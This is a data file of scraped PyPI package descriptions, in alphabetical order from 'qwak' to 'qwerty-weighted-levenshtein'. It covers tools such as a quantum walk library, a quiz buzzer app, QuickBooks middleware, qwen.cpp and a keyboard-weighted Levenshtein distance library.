example:importnetworkxasnximportmatplotlib.pyplotaspltfromqwak.qwakimportQWAKn=100t=12initState=[n//2,n//2+1]graph=nx.cycle_graph(n)qwak=QWAK(graph)qwak.runWalk(t,initState)probVec=qwak.getProbVec()plt.plot(probVec)plt.show()Further examples exploring all the different components will be available once theusagedocumentation is complete.DocumentationDocumentation is a work in progress, and can be found in thispage.ContributingExtra requirementsautopep8pytestsphinxContributing to the package follows a relatively simple workflow. After performing the necessary setup procedures,\nyou will update your fork with the latest version of the QWAK project. You can now perform your changes, format\nthem and test them. If a new feature is added, you will need to add docstrings to the new methods and update the\nexisting documentation accordingly. If your contribution is directly to the documentation, you will follow a similar procedure.Step-by-step instructions on how to setup all the required components for organized contribution can be found\non thecontributingdocumentation page."} +{"package": "qwant", "pacakge-description": "#My qwant toolbox\n\nQwant is search context-independet and non-spying engine\n* Better for e-commerce search than Google\n* Free. Using on industrial scale\nrequires proxy that is way cheeper than google\n* Available for multithreading\n* Context-independet, that means a consistent output for you queries\n\nimport qwant\n\nqwant.search(\"Barbie doll\") \n\n#get only items of search. 10 by default\nqwant.items(\"Barbie doll\")\n\n#but you can get more. It's done with multiple requests\nqwant.items(\"Barbie doll\",count=100)\n\n#you can set web site of search\nqwant.items(\"site:allegro.pl/oferta/ Barbie doll\")\n\n#add your proxy\nsession={}\nqwant.items(\"site:allegro.pl/oferta/ Barbie doll\",session=session)\n\n#you can use luminati so EVERY request would be done from different IP\nimport luminati\nsession = luminati.session(\"\", \"\")\nqwant.items(\"site:allegro.pl/oferta/ Illuminati doll\",session=session)"} +{"package": "qwantz-metadata", "pacakge-description": "Dinosaur Comic Metadata ProcessorA set of tools for collecting variousRyan North'sDinosaur Comicsmetadata and compiling them into one JSON document.It uses transcripts obtained using my other project,https://github.com/janek37/parse_qwantz.InstallationInstallqwantz-metadatawithpippipinstallqwantz-metadataUsageYou need three directories: one containing the comic transcripts, one containing the footer transcripts, and one containing raw HTML files.The transcripts and footers are required to be plain text files with filenames like - .txt, e.g.0001 - comic2-02.png.txt.The filenames of the HTML files are not relevant.Once the directories are ready, runqwantz-metadatato print the combined metadata JSON document to the standard output:$ qwantz-metadata > output.jsonAcknowledgmentsThis program would not be possible without the wonderful comics by Ryan North!"} +{"package": "qwark", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qwasm", "pacakge-description": "No description available on PyPI."} +{"package": "qwazzock", "pacakge-description": "qwazzockAn app for hosting quizes remotely.Installingpip install qwazzockUsageStart an instance of the app using:qwazzockCreate a route to localhost:5000 using a hostname included in the SSL certificate.Instruct players to navigate to the site's root address (e.g.http://127.0.0.1:5000). They can then enter their name, team name and buzz when they know the answer. Note that players to be on the same team, their team names must match exactly (including case).As a host, you can then navigate to the/hostpath (e.g.http://127.0.0.1:5000/host) in order to see who has buzzed first and to mark their answer. You can respond with the following:passcan be used when no one wants to buzz in who still can, as they don't know the answer. It clears the hotseat if occupied (e.g if someone buzzed accidentally), and any locked out teams become unlocked.rightclears the hotseat, any locked out teams and awards the team a point.wrongplaces the team who answered onto a \"locked out\" list, preventing them from buzzing in until the current question completed.You can also useresetto wipe all data for the in progress game and start a new one.Clicking on the team's button will lock out that team until the end of the round. This can be useful for managing elimitator rounds and the like.Question TypesThere are two \"question types\" you can select,standardorpicture.StandardThis is the default question type. It allows you to ask any question and decide if the answer is right or wrong.PictureWhen this quesiton type is selected, all players are presnted with a randomly selected image from thequestionsfolder in the content directory (see below) as their buzzer image. You will be presented with the name of the image they are seeing.The ordering of the images is random. Once you selectpass,rightorwrong, the next image in the list will be presented. This will continue until you change question type, or you run out of question images. If the latter occurs, the question type will automatically revery back tostandard.Should you not provide a content directory, the content directory does not contain aquestionsfolder, or thequestionsfolder is empty, then the question type will automatically revert back tostandard.Environment variablesBehaviour of the application can be tweaked by setting the following environment variables:NameOptionsDefaultDescriptionQWAZZOCK_CONTENT_PATHA valid absolute path.Not setIf set, additional content is loaded into qwazzock from this directory.QWAZZOCK_LOG_LEVELDEBUG,INFO,WARNING,ERRORINFOLog application events at this level and above.QWAZZOCK_SOCKETIO_DEBUG_MODEAnyNot setIf set, access logs from socketio will be output.Content DirectoryFor a more interactive experience, you can load custom content into a \"content directory\" and provide this to qwazzock using theQWAZZOCK_CONTENT_PATHenvironment variable.Currently, the only supported custom content is images for use with thepicturequestion type. These must be loaded into aquestionsfolder within the content directory. The file name should be the answer as you wish it to appear to the host.DevelopmentInitialise development environmentmake initStandup a local dev servermake devThe server will be accessible athttps://127.0.0.1:5000.Run all testsmake testThis includes:unit tests (make unit_test).static code analysis (make bandit).dependency vulnerability analysis (make safety).Build artefactsmake buildThis includes:pip wheel (make build_wheel).docker image (make build_image).Standup a local containermake runStop local containersmake stopRelease versionTag the repository with the project version and publish the distributables toPyPI.Local repo must be clean.poetry config pypi-token.pypi ${your-pypi-token}\nmake release"} +{"package": "qwb_nester", "pacakge-description": "UNKNOWN"} +{"package": "qwc", "pacakge-description": "qwc-middlewareSOAP service for connecting to QuickBooks webconnector.Built using the framework built by Bill Barry in:https://github.com/BillBarry/pyqwcUpdated for use with python3, WebConnector version 2.3.0.207, and rapid proto-typing of\ndifferent QuickBooks objects.Useageqwc is a soap server with built in client that uses redis to queue raw QBXML to be processed\nby the QuickBooks WebConnector. This is an asynchronous process that requires the client to listen\nfor when work has been completed by the QBWC.[client] >> sends qbxml >> [redis][QBWC] >> checks redis for new tickets >> [redis][redis] >> sends qbxml via ticket >> [QBWC][QBWC] >> process ticket and returns reslt/error >> [redis][client] >> query or subscribe to redis for result >> [redis]Install the package in a fresh environment:python -m venv .venvthen in install the package with pip:python -m pip install qwcOr get the latest development version from github:python -m pip install git+https::/github.com/bill-ash/qwc-middlewareIf noconfig.inifile is found in the local directory, the default included with the package will be\nused:[qwc]\nqbwfilename = ''\n\nusername = 'qbwcuser'\n# Password entered when install the .qwc file to QuickBooks WebConnector.\npassword = 'test'\nhost = 'localhost'\nport = 4244\n\n[redis]\nhost = '127.0.0.1'\nport = 6379\npassword = ''\ndb = 0Install thepyqwc.qwcfile to the QuickBooks WebConnector by opening the WebConnector,File >> AppManagement >> Update Web Servicesand choosepyqwc.qwc. The default password istest.Start the service with:python -m qwc.scripts.start_serverThen, in a new terminal start a new session adding commands to be executed with the client.qwcClient = QBWCClient()\n\nreqXML = add_customer('SuperCustomer123')\n\n# Send the request to Redis to be processed by QuickBooks WebConnector \nqwcClient.sendxml(reqXML)Check the examples directory for additional information.Once new work has been delivered to the Redis queue, run an update from the QuickBooks WebConnector\nto execute the pending work to be performed.Sample .qwc fileBelow is a sample .qwc file to be installed to the QuickBooks WebConnector:\n\n QWCTestService\n \n http://localhost:4244/qwc/\n Python access to Quickbooks\n http://localhost:4244/\n qbwcuser\n {6801a7d2-3fb4-4643-8ef0-5e702b99521e}\n }495b6884-e33f-4dba-9ecc-a3bbad96a971}\n QBFS\n \n 60\n \nSave this file with a.qwcextension to successfully install to the WebConnector.Examplefrom qwc.client import QBWCClient\nfrom qwc.objects import add_customer\nfrom qwc.service import start_server\n\n# Create the QBXML\ncustomer = add_customer(name='BillAsh123')\n\n# Start a new client \nclient = QBWCClient()\n\n# Deliver the QBXML to redis to be processed \nclient.sendxml(customer)\n\n# Start the server and then update the installed service from QuickBooks WebConnector\nstart_server()"} +{"package": "qwcore", "pacakge-description": "Core utils forqwcodeprojects."} +{"package": "qwc-services-core", "pacakge-description": "Shared modules for QWC services."} +{"package": "qwd", "pacakge-description": "Makegit rev-list --count HEADeasy to type by just calling itqwd q.Safe commandstypeto doqwd qgit rev-list --count HEADqwd qwgit branchqwd wgit log -3qwd wdgit diff --cachedDestructive commandsEach destructive command prompts confirmation before execution.typeto dotranslationqwd qwdgit add .\u2192git status\u2192git commit -m \"\"I made some changes, but I don't remember what I did. Create a commit for me.qwd qwdgit status\u2192git checkout main\u2192git pullInstallingvia PyPI, runpip install qwd."} +{"package": "qwdeploy", "pacakge-description": "Core utils for Defining and Deploying StacksDocs:http://qwdeploy.readthedocs.org/en/latest/"} +{"package": "qweatherPyAPI", "pacakge-description": "QWeather APIoho ~, find me here:https://github.com/shaun17/qweather-api.git"} +{"package": "qwebtip", "pacakge-description": "A Qt package that lets you use web URLs as tooltips in Qt widgets.Free software: BSD 2-Clause LicenseRequiresPySide or PyQt4 with QtWebKit included.Installationpip install qwebtipHow To UseImport qwebtip\u2019s main model,qweburltipand set it to override one of\nyour widget\u2019s tooltips with some URL.The next time you build your application and hover over that widget, a URL box\nis displayed with that URL, instead.fromqwebtipimportqweburltipurl='http://pyqt.sourceforge.net/Docs/PyQt4/qwebframe.html'qweburltip.override_tool_tip(QtWidgets.QLabel('Some label'),url)How To Use - CustomizingSetting a custom tooltip sizefromqwebtipimportqweburltipurl='http://pyqt.sourceforge.net/Docs/PyQt4/qwebframe.html'qweburltip.override_tool_tip(QtWidgets.QLabel('Some label'),url,width=100,height=400,)Opening the URL at a specific header sectionurl='http://pyqt.sourceforge.net/Docs/PyQt4/qwebframe.html'qweburltip.override_tool_tip(self.line_edit,element_selector.UnknownHeaderSelector(url,'Method Documentation',),)Disabling CachingLoaded webpages are cached so that successive loads can be kept fast.\nTo disable caching, set this environment variable.exportQWEBTIP_DISABLE_CACHING=1This is useful for debugging but is not recommended.Changelog0.2.0 (2019-06-02)Reformatted the code to use [black](https://github.com/python/black)0.1.0 (2018-12-04)First release on PyPI."} +{"package": "qwelog", "pacakge-description": "The simple personal logger that is so easy, you\u2019ll use it."} +{"package": "qwen", "pacakge-description": "Qwen-VLMy personal implementation of the model from \"Qwen-VL: A Frontier Large Vision-Language Model with Versatile Abilities\", they haven't released model code yet sooo...\nFor more details, please refer to thefull paper.Installpip3 install qwenUsage# Importing the necessary librariesimporttorchfromqwenimportQwen# Creating an instance of the Qwen modelmodel=Qwen()# Generating random text and image tensorstext=torch.randint(0,20000,(1,1024))img=torch.randn(1,3,256,256)# Passing the image and text tensors through the modelout=model(img,text)# (1, 1024, 20000)TodoPosition aware vision language adapter, compresses image features. Singer layer cross attention module inited randomly => group of trainable embeddings as query vectors + image features from the visual encoder as keys for cross attention ops => OUTPUT: compresses visual feature sequence to a fixed lnegth of 256, 2d absolute positional encodings are integrated into the cross attentions mechanisms query key pairs => compressed feature sequence of length of 256 => fed into decoder llmBounding Boxes, for any given accurate bounding box, a norm process is applied in the range [0, 1000] and transformed into a string format (Xtope, Ytople)(Xottomright, Ybottomright) -> the string is tokenized as text and does not require positional vocabulary. Detection strings and regular text strings, two special tokens and are added to the beginning and end of the bounding box string. + another sed of special tokens ( and ) is introduced.CitationsPlease use the following to cite this work:@article{bai2023qwen,title={Qwen-VL: A Frontier Large Vision-Language Model with Versatile Abilities},author={Bai, Jinze and Bai, Shuai and Yang, Shusheng and Wang, Shijie and Tan, Sinan and Wang, Peng and Lin, Junyang and Zhou, Chang and Zhou, Jingren},journal={arXiv preprint arXiv:2308.12966},year={2023},url={https://doi.org/10.48550/arXiv.2308.12966}}"} +{"package": "qwen7b-tr", "pacakge-description": "qwen7b-trTranslate/Chat using a qwen-7b-chat API at huggingfaceInstall itpipinstallqwen7b-tr--upgrade# pip install git+https://github.com/ffreemt/qwen7b-tr# poetry add git+https://github.com/ffreemt/qwen7b-tr# git clone https://github.com/ffreemt/qwen7b-tr && cd qwen7b-trUse itfromqwen7b_tr.__main__importqwen7b_tr# This is in fact just chat with the qwen-7b-chat modelprint(qwen7b_tr(\"\u4f60\u597d\"))# \u4f60\u597d\uff01\u6709\u4ec0\u4e48\u6211\u80fd\u5e2e\u52a9\u4f60\u7684\u5417\uff1fFrom command linepython -m qwen7b_tr test abc\n# or qwen7b-tr test abc\u4e09\u4e2a\u7248\u672c\u5982\u4e0b\uff1a1.\u6d4b\u8bd5abc2.ABC\u6d4b\u8bd53.\u4e09\u53f7\u6d4b\u8bd5ABCIf no text is provided, the content of the clipboard will be used.python -m qwen7b_tr# Assume the clipboard contains `available`Notextprovided,translatingthecontentoftheclipboard...diggin...\nLoadedasAPI:https://mikeee-qwen-7b-chat.hf.space/\u2714\n\navailable\n\n\u4ee5\u4e0b\u662f\u4e09\u4e2a\u4e0d\u540c\u7684\u4e2d\u6587\u7248\u672c\uff1a1.\u53ef\u7528\u76842.\u53ef\u83b7\u5f97\u76843.\u6709\u6548\u7684Target language can be specified with -tpython -m qwen7b_tr -t \u5fb7\u8bedNo text provided, translating the content of the clipboard...\n diggin...\nLoaded as API: https://mikeee-qwen-7b-chat.hf.space/ \u2714\n\navailable\n\n1. \"Verf\u00fcgbare\"\n 2. \"Sollte\"\n 3. \"Da ist\"python -m qwen7b_tr -t \u82f1\u8bed \u6211\u56fd\u670d\u52a1\u8d38\u6613\u201c\u670b\u53cb\u5708\u201d\u65e5\u76ca\u6269\u5927\n diggin...\nLoaded as API: https://mikeee-qwen-7b-chat.hf.space/ \u2714\n\n\u6211\u56fd\u670d\u52a1\u8d38\u6613\u201c\u670b\u53cb\u5708\u201d\u65e5\u76ca\u6269\u5927\n\n1. China's circle of service trade friends is expanding.\n 2. The circle of China's service trade partners is growing larger.\n 3. China's circle of service trade acquaintances is increasing.Help and Manualpython -m qwen7b_tr --help\n\n# or\nqwen7b-tr --helpUsage:python-mqwen7b_tr[OPTIONS][QUESTION]...Translateviaqwen-7b-chathuggingfaceAPI.\n\nArguments:[QUESTION]...Sourcetextorquestion.\n\nOptions:-c,--clipbUseclipboardcontentifsetorif`question`isempty.-t,--to-langTEXTTargetlanguagewhenusingthedefaultprompt.[default:\u4e2d\u6587]-n,--numbINTEGERnumberoftranslationvariantswhenusingthedefaultprompt.[default3]-m,--max-new-tokensINTEGERMaxnewtokens.[default:256]--temperature,--tempINTEGERTemperature.[default:0.81]--repetition-penalty,--repFLOATRepetitionpenalty.[default:1.1]--top-k,--top_kINTEGERTop_k.[default:0]--top-p,--top_pFLOATTop_p.[default:0.9]--user-promptTEXTUserprompt.[default:'\u7ffb\u6210\u4e2d\u6587\uff0c\u5217\u51fa3\u4e2a\u7248\u672c.']-p,--system-promptTEXTUserdefinedsystemprompt.[default:'Youare a helpful assistant.']-v,-V,--versionShowversioninfoandexit.--helpShowthismessageandexit.More Examplestemperature# default temperature 0.81\npython -m qwen7b_tr marketing is critical to ensure fan interest remains high\n\n1. \u8425\u9500\u5bf9\u4e8e\u786e\u4fdd\u7c89\u4e1d\u7684\u5174\u8da3\u4fdd\u6301\u9ad8\u6c34\u5e73\u81f3\u5173\u91cd\u8981\u3002\n2. \u5e02\u573a\u8425\u9500\u5bf9\u4e8e\u7ef4\u6301\u7c89\u4e1d\u7684\u5174\u8da3\u81f3\u5173\u91cd\u8981\u3002\n3. \u7c89\u4e1d\u7684\u5174\u8da3\u6c34\u5e73\u9700\u8981\u901a\u8fc7\u6709\u6548\u7684\u5e02\u573a\u8425\u9500\u6765\u4fdd\u6301\u3002# a high temperature reuslts in a versatile outcome\npython -m qwen7b_tr --temp 1.1 marketing is critical to ensure fan interest remains high\n\n1. \u8425\u9500\u81f3\u5173\u91cd\u8981\uff0c\u4ee5\u786e\u4fdd\u7403\u8ff7\u7684\u5174\u8da3\u7ee7\u7eed\u4fdd\u6301\u9ad8\u6c34\u5e73\u3002\n2. \u8425\u9500\u5de5\u4f5c\u662f\u81f3\u5173\u91cd\u8981\u7684\uff0c\u4ee5\u4fdd\u6301\u7403\u8ff7\u7684\u5174\u8da3\u3002\n3. \u63a8\u5e7f\u662f\u4fdd\u6301\u7403\u8ff7\u5173\u6ce8\u5ea6\u7684\u5173\u952e\u3002A very high temperature (for example 1.5) may result in some nonsensical output.-n: number of translation variantsIf you wish to have more choices, for example 5 variantspython -m qwen7b_tr -n 5 marketing campaign companion\n\n 1. \u8425\u9500\u6d3b\u52a8\u4f19\u4f34\n 2. \u5e02\u573a\u8425\u9500\u6d3b\u52a8\u4f34\u4fa3\n 3. \u8425\u9500\u6d3b\u52a8\u52a9\u624b\n 4. \u5e02\u573a\u8425\u9500\u6d3b\u52a8\u652f\u6301\u8005\n 5. \u8425\u9500\u6d3b\u52a8\u534f\u4f5c\u8005max new tokensThe defaultmax_new_tokensis 256, sutiable for chatting. If you translate a large chunk of text. you may wish to setmax_new_tokensto 1024.python -m qwen7b_tr --max-new-tokens 1024 blah blah ...Develop and Debugset LOGURU_LEVEL=TRACE\n\n# or in linux\nexport LOGURU_LEVEL=TRACEto see a lot of debug messages"} +{"package": "qwen-cpp", "pacakge-description": "qwen.cppC++ implementation ofQwen-LMfor real-time chatting on your MacBook.FeaturesHighlights:Pure C++ implementation based onggml, working in the same way asllama.cpp.Pure C++ tiktoken implementation.Streaming generation with typewriter effect.Python binding.Support Matrix:Hardwares: x86/arm CPU, NVIDIA GPUPlatforms: Linux, MacOSModels:Qwen-LMGetting StartedPreparationClone the qwen.cpp repository into your local machine:gitclone--recursivehttps://github.com/QwenLM/qwen.cpp&&cdqwen.cppIf you forgot the--recursiveflag when cloning the repository, run the following command in theqwen.cppfolder:gitsubmoduleupdate--init--recursiveDownload the qwen.tiktoken file fromHugging Faceormodelscope.Quantize ModelUseconvert.pyto transform Qwen-LM into quantized GGML format. For example, to convert the fp16 original model to q4_0 (quantized int4) GGML model, run:python3qwen_cpp/convert.py-iQwen/Qwen-7B-Chat-tq4_0-oqwen7b-ggml.binThe original model (-i ) can be a HuggingFace model name or a local path to your pre-downloaded model. Currently supported models are:Qwen-7B:Qwen/Qwen-7B-ChatQwen-14B:Qwen/Qwen-14B-ChatYou are free to try any of the below quantization types by specifying-t :q4_0: 4-bit integer quantization with fp16 scales.q4_1: 4-bit integer quantization with fp16 scales and minimum values.q5_0: 5-bit integer quantization with fp16 scales.q5_1: 5-bit integer quantization with fp16 scales and minimum values.q8_0: 8-bit integer quantization with fp16 scales.f16: half precision floating point weights without quantization.f32: single precision floating point weights without quantization.Build & RunCompile the project using CMake:cmake-Bbuild\ncmake--buildbuild-j--configReleaseNow you may chat with the quantized Qwen-7B-Chat model by running:./build/bin/main-mqwen7b-ggml.bin--tiktokenQwen-7B-Chat/qwen.tiktoken-p\u4f60\u597d# \u4f60\u597d\uff01\u5f88\u9ad8\u5174\u4e3a\u4f60\u63d0\u4f9b\u5e2e\u52a9\u3002To run the model in interactive mode, add the-iflag. For example:./build/bin/main-mqwen7b-ggml.bin--tiktokenQwen-7B-Chat/qwen.tiktoken-iIn interactive mode, your chat history will serve as the context for the next-round conversation.Run./build/bin/main -hto explore more options!Using BLASOpenBLASOpenBLAS provides acceleration on CPU. Add the CMake flag-DGGML_OPENBLAS=ONto enable it.cmake-Bbuild-DGGML_OPENBLAS=ON&&cmake--buildbuild-jcuBLAScuBLAS uses NVIDIA GPU to accelerate BLAS. Add the CMake flag-DGGML_CUBLAS=ONto enable it.cmake-Bbuild-DGGML_CUBLAS=ON&&cmake--buildbuild-jMetalMPS (Metal Performance Shaders) allows computation to run on powerful Apple Silicon GPU. Add the CMake flag-DGGML_METAL=ONto enable it.cmake-Bbuild-DGGML_METAL=ON&&cmake--buildbuild-jPython BindingThe Python binding provides high-levelchatandstream_chatinterface similar to the original Hugging Face Qwen-7B.InstallationInstall from PyPI (recommended): will trigger compilation on your platform.pipinstall-Uqwen-cppYou may also install from source.# install from the latest source hosted on GitHubpipinstallgit+https://github.com/QwenLM/qwen.cpp.git@master# or install from your local source after git cloning the repopipinstall.tiktoken.cppWe provide pure C++ tiktoken implementation. After installation, the usage is the same as openai tiktoken:importtiktoken_cppastiktokenenc=tiktoken.get_encoding(\"cl100k_base\")assertenc.decode(enc.encode(\"hello world\"))==\"hello world\"BenchmarkThe speed of tiktoken.cpp is on par with openai tiktoken:cdtestsRAYON_NUM_THREADS=1pythonbenchmark.pyDevelopmentUnit TestTo perform unit tests, add this CMake flag-DQWEN_ENABLE_TESTING=ONto enable testing. Recompile and run the unit test (including benchmark).mkdir-pbuild&&cdbuild\ncmake..-DQWEN_ENABLE_TESTING=ON&&make-j\n./bin/qwen_testLintTo format the code, runmake lintinside thebuildfolder. You should haveclang-format,blackandisortpre-installed.AcknowledgementsThis project is greatly inspired byllama.cpp,chatglm.cpp,ggml,tiktoken,tokenizer,cpp-base64,re2andunordered_dense."} +{"package": "qwer", "pacakge-description": "UNKNOWN"} +{"package": "qwerasd", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qwer-python", "pacakge-description": "No description available on PyPI."} +{"package": "qwert", "pacakge-description": "Python extensionsInstallation$pip3installqwert"} +{"package": "qwert1234", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "qwertasyx", "pacakge-description": "No description available on PyPI."} +{"package": "qwerty", "pacakge-description": "| BRANCH | BUILD STATUS | COVERAGE | REQUIREMENTS | ISSUES | OPEN PRs || --- | :---: | :---: | :---: | :---: | :---: || Master | [![Build Status](https://travis-ci.org/DrTexxOfficial/dbi.svg?branch=master)](https://travis-ci.org/DrTexxOfficial/dbi) | [![codecov](https://codecov.io/gh/DrTexxOfficial/dbi/branch/master/graph/badge.svg)](https://codecov.io/gh/DrTexxOfficial/dbi) | [![Requirements Status](https://requires.io/github/DrTexxOfficial/dbi/requirements.svg?branch=master)](https://requires.io/github/DrTexxOfficial/dbi/requirements/?branch=master) | [![GitHub issues](https://img.shields.io/github/issues/DrTexxOfficial/dbi.svg?branch=master)](https://GitHub.com/DrTexxOfficial/dbi/issues/) | [![GitHub pull-requests](https://img.shields.io/github/issues-pr/DrTexxOfficial/dbi.svg?branch=master)](https://GitHub.com/DrTexxOfficial/dbi/pull/) || Develop | [![Build Status](https://travis-ci.org/DrTexxOfficial/dbi.svg?branch=develop)](https://travis-ci.org/DrTexxOfficial/dbi) | [![codecov](https://codecov.io/gh/DrTexxOfficial/dbi/branch/develop/graph/badge.svg)](https://codecov.io/gh/DrTexxOfficial/dbi) | [![Requirements Status](https://requires.io/github/DrTexxOfficial/dbi/requirements.svg?branch=develop)](https://requires.io/github/DrTexxOfficial/dbi/requirements/?branch=develop)# Debug Interface - DBI[![PyPI Version](https://img.shields.io/pypi/v/dbi.svg)](https://pypi.python.org/pypi/dbi/)[![GitHub release](https://img.shields.io/github/release/drtexxofficial/dbi.svg)](https://GitHub.com/DrTexxOfficial/dbi/releases/)[![GitHub license](https://img.shields.io/github/license/DrTexxOfficial/dbi.svg?branch=master)](https://github.com/DrTexxOfficial/dbi/blob/master/LICENSE)[![Github all releases](https://img.shields.io/github/downloads/DrTexxOfficial/dbi/total.svg)](https://GitHub.com/DrTexxOfficial/dbi/releases/)\"dbi## Installation### Install via pipInstall as user (recommended):$ pip3 install dbi --userInstall as root:$ sudo pip3 install dbi### Install from sourceClone this repository:$ git clone https://github.com/DrTexxOfficial/dbi.gitInstall requirements:$ cd dbi$ pip3 install -r requirements.txt --user## Script Functionality### User-Written Verbosity-Dependant Debug Messages- information is only show when A and B are satisfied- debugging is active- the threshold verbosity is reached or exceeded (this threshold is specified on a per-message basis)- verbosity can be- set in advanced- **modified on-the-fly**- multiple **external functions** can be executed in a single-line- users can write their own debugging messages on the status of each function's progress- console output is colour-coded (based on verbosity levels)## What is the purpose?My console had become populated by indecernable walls of debugging text, all thanks to riddling my scripts with lines like `print(str(var),var)` for debugging.So I created a module to maintain my sanity and save my time.## ExamplesInitial config:```python3from dbi import Dbidbi = Dbi(3,True)dpm = dbi.print_message```Generic example:```[IN ]: dpm(2,\"message with\",\"sub-message\")[OUT]: [3][2]<=[2018-12-10 01:54:59.845995] message with | sub-message```
[![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/)"} +{"package": "qwertyenv", "pacakge-description": "qwertyenvGym environments (Reinforcement Learning)Black Jack (from RLBook2018)Collect Coins (Chess like)\"Ensure Valid Action\" Gym wrapper.\"Up/Down/Left/Right\" Gym wrapper - relevant for example for the Collect Coins environment when the piece is a rock.pip install qwertyenvExample usages for the Black Jack environment and for the Collect Coins environment can be found on github (the project's home)."} +{"package": "qwertyPOOL", "pacakge-description": "Qwerty POOLPOOL stands for Python Operating Other Languages.\nQwerty POOL is made to operate other languages such as java and implement different opportunities such as creating windows.InstallationYou can install Qwerty POOL fromPyPI:pip install qwertyPOOLOr you can install Qwerty POOL fromGithub:git clone https://github.com/pi-this/POOL.gitHow to useIf Java is not installed already use the following command to install it:import qwertyPOOL\nqwertyPOOL.java.jdk()\nqwerty.java.jre()Although Qwerty POOL's possibilities are short within version 1.0.0, it has the capability to display a window with text from javaTo open a window in Qwerty POOL:import qwertyPOOL\nqwertyPOOL.run.do()To Change the POOL icon:from qwertyPOOL import java as Lj\nLj.window.SetImage(\"face.png\")\nLj.window.open()\nLj.runj()To Add Text to the window:from qwertyPOOL import java as Lj\nLj.window.SetText(\"hello qwertyPOOL!\")\nLj.window.open()\nLj.runj()To View Qwerty POOL's version:qwertyPOOL.operating.version()Or:print(qwertyPOOL.__version__)To Wait in Qwerty POOL:qwertyPOOL.python.wait(2) # seconds"} +{"package": "qwertypy", "pacakge-description": "qwertypyPython utilities library for financial utilities, data analysis, visualization and DSA.Quick linksGithubPyPIDocsInstallationpipinstallqwertypyUpgradepipinstall--upgradeqwertypyUsageTry on colab:Click hereqwertypy.greetingsimportqwertypy.greetingsasqpyGreetingsprint(qpyGreetings.hello())qwertypy.tickertapeqwertypy.tickertape.companiesimportqwertypy.tickertape.companiesasttCompaniestopCompanies=ttCompanies.getTopCompanies()print(\"TOP = \",len(topCompanies))# print(\"ALL = \", len(ttCompanies.getAllCompanies()))ttName=\"reliance-industries-RELI\"companyInfo=ttCompanies.getCompanyInfo(ttName)print(companyInfo)qwertypy.tickertape.financialsimportqwertypy.tickertape.financialsasttFinancialsttName=\"reliance-industries-RELI\"forstatementTypeinttFinancials.statementTypes:statement=ttFinancials.getStatement(ttName,statementType)print(statementType,type(statement))ttName=\"reliance-industries-RELI\"statementType=ttFinancials.statementTypes[\"income\"]statement=ttFinancials.getStatement(ttName,statementType)yearsAndValues=ttFinancials.getYearsAndValues(statement,\"incDps\")print(yearsAndValues)qwertypy.data_analysisqwertypy.data_analysis.regressionimportqwertypy.data_analysis.regressionasqpyRegressionxTrain=[1,2,3,4,5,6]yTrain=[2,4,6,8,10,12]model=qpyRegression.QpyLinearRegression(xTrain,yTrain)model.train()yPredict=model.getPrediction()print(\"yPredict: \",yPredict)xPredict2=[10,11]yExpected=[20,22]yPredict2=model.getPrediction(xPredict2)print(\"yPredict2: \",yPredict2)qwertypy.data_plotsqwertypy.data_plots.trend_plotimportrandomimportqwertypy.data_plots.trend_plotasqpyTrendPlotxValues=[iforiinrange(10)]yValues=[random.randint(1,10)for_inrange(10)]xTicks=[\"xTick\"+str(i+1)foriinrange(10)]trendValues=list(yValues)qpyTrendPlot.trendPlot(xValues,yValues,xTicks=xTicks,rotateXTicks=90,xLabel=\"xLabel\",yLabel=\"yLabel\",plotTitle=\"plotTitle\",trendValues=trendValues,legends=[\"trendLegend\",\"barLegend\"],text=\"text\",textBackground=\"red\",watermark=\"watermark\",showValues=True,# saveToFile = \"testImage.jpg\")qwertypy.dsaqwertypy.dsa.single_source_shortest_pathfromcollectionsimportdefaultdictfromqwertypy.dsa.single_source_shortest_pathimportdijkstran=9edges=[(0,1,4),(0,7,8),(1,7,11),(1,2,8),(7,8,7),(7,6,1),(2,8,2),(8,6,6),(2,3,7),(2,5,4),(6,5,2),(3,5,14),(3,4,9),(5,4,10)]graph=defaultdict(lambda:defaultdict(int))foru,v,dinedges:graph[u][v]=graph[v][u]=dprint(dijkstra(graph,0,n))print(dijkstra(graph,1,n))qwertypy.dsa.all_pairs_shortest_pathfromcollectionsimportdefaultdictfromqwertypy.dsa.all_pairs_shortest_pathimportfwedges=[[1,2,3],[1,4,7],[2,1,8],[2,3,2],[3,1,5],[3,4,1],[4,1,2]]graph=defaultdict(dict)foru,v,costinedges:graph[u-1][v-1]=costfw(graph,len(graph))qwertypy.dsa.strongly_connected_componentsfromcollectionsimportdefaultdictfromqwertypy.dsa.strongly_connected_componentsimporttarjanedges=[[0,1],[2,0],[1,3],[3,4],[4,5],[5,6],[6,4]]graph=defaultdict(list)foru,vinedges:graph[u].append(v)low=tarjan(graph)print(\"low: \",low)scc=defaultdict(list)forkeyinlow:scc[low[key]].append(key)print(\"Strongly connected components: \",list(scc.values()))bridges=[]foru,vinedges:ifscc[u]!=scc[v]:bridges.append([u,v])print(\"Bridges: \",bridges)"} +{"package": "qwertysunnyday", "pacakge-description": "No description available on PyPI."} +{"package": "qwertyui", "pacakge-description": "No description available on PyPI."} +{"package": "qwertyuiopl", "pacakge-description": "\u0423\u0440\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f!"} +{"package": "qwerty-weighted-levenshtein", "pacakge-description": "QWERTY WEIGHTED LEVENSHTEINImplementation of Levensthtein and Damerau-Levenshtein edit distances (and similarity) weighted on the QWERTY keyboard proximity.Not all edits are equal! Insertions and substitutions of characters should be considered differently if the characters are close to each other in a standard QWERTY keyboard.This library it gives different distances based on the closeness of characters in the keyboard and it returns the Levensthtein edit distance (insertion, deletion, substition of characters) as well as Damerau-Levenshtein distanceIt also provides similarity scores from 0.0 to 1.0 denoting how similar the two strings are.Installpip install qwerty-weighted-levenshteinUsageBasic use:fromqwerty_weighted_levenshteinimportqwerty_weighted_levenshteinqwerty_weighted_levenshtein(\"test\",\"pest\")# It returns 1.0 as it requires one substitution (t > p = 1.0)qwerty_weighted_levenshtein(\"test\",\"yest\")# It returns 0.7 as t and y are close in the keyboard (t > y = 0.7)More infoWeighting Edit Distance to\nImprove Spelling Correction in\nMusic Entity Search: Master's thesis of A. Samuellson implementing same principle for Spotify Search engine and showing correlation between physical position of keys on the keyboard and spelling mistakes/infoscout/weighted-levenshtein: Cython library implementing 